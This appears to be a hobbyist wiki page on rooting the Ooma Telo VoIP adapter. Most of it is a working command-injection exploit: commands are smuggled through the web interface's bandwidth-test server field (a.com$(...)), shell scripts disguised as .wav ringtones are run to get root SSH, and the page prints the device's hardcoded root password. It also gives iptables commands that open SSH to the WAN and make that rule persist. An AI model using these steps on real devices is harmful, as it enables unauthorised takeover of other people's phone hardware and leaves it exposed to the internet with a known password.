Ooma Telo
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
This page will be dedicated to a general overview, descriptions, and information related to the Ooma Telo.
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Ooma Telo at Amazon
GPL
You can find GPL code for the Ooma Telo Here
Disassembly
UART
Exploiting the Ooma Web Interface (iPerf)
- In order to access the Ooma Telo panel web interface you must either be plugged into the "LAN" port on the back of the device OR have the "remote administration" checkbox checked in the Ooma web interface panel.
Option 1
- Visit the Ooma web interface (The default IP for the LAN side is [1])
- In the left menu panel click "Tools"
- In the left panel click "Bandwidth"
- In the server field you can enter in any in the following syntax
a.com$(COMMANDHERE)
- Click "Run Test"
Option 2
- Download OomaPwn.zip
- Visit the Ooma web interface (The default IP for the LAN side is [2])
- Go to Ringtones and upload both .wav files from downloaded OomaPwn.zip
- Navigate to Tools -> Bandwidth
- Enter the following one at a time into the Server IP Address
- Note: It will report an error, this is normal.
$(chmod 755 /media/ringtone/*pwn.wav)
$(/bin/sh /media/ringtone/*pwn.wav)
- Note: It will report an error, this is normal.
- When the script is done the Ooma unit will reboot
- You now have SSH access to the unit. root password is !ooma123
Dropbear SSHD
The default credentials for the Ooma Telo are:
Username: root
Password: !ooma123
Dropbear runs on kernel boot by default but is blocked by iptable rules.
IPTable Rules
Remote command execution through iperf screen hostname:
x.com$(reboot)
Enable LAN SSH
x.com$(iptables -t filter -A LAN_SSH -j ACCEPT)
Enable SSH on WAN
x.com$(iptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT)
Permanently edit iptables rule (till next update)
mount -o,remount -rw -t ubifs ubi0:rootfsa / echo -e "\n#Add sshd server\niptables -t filter -I FireWall 1 -p tcp --destination-port 22 -j ACCEPT" >> /etc/ip_table.rules mount -o,remount -r -t ubifs ubi0:rootfsa /